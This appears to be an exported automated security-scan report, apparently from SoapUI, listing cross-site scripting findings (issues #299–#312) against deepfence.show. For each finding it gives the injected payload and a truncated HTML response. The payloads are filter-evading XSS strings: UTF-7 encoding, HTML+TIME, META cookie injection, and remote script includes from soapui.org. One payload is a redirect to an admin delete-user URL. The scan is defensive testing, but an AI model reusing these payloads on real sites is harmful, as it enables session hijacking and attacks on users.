lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #299\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('\nXSS')\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD\n=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #300\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:\nschemas-microsoft-com:time\"><?import namespace=\"t\" \nimplementation=\"#default#time2\"><t:set attributeName=\"\ninnerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot\n;)&lt;/SCRIPT&gt;\"></BODY></HTML>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #301\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=\"http://soapui.org/xss.jpg\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #302\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #303\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# <IMG SRC=\"http://soapui.org/somecommand.php?\nsomevariables=maliciouscode\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #304\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# Redirect 302 /a.jpg http://soapui.org/admin.asp&\ndeleteuser\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #305\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;\nSCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #306\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"\ntext/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('\nXSS');+ADw-/SCRIPT+AD4-Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #307\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=\">\" SRC=\"http://soapui.org/xss.js\"></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79Issue Number #308\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT =\">\" SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #309\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=\">\" '' SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #310\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT \"a='>'\" SRC=\"http://soapui.org/xss.js\"></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #311\nScan Cross Site ScriptingSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT a=`>` SRC=\"http://soapui.org/xss.js\"></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #312\nScan Cross 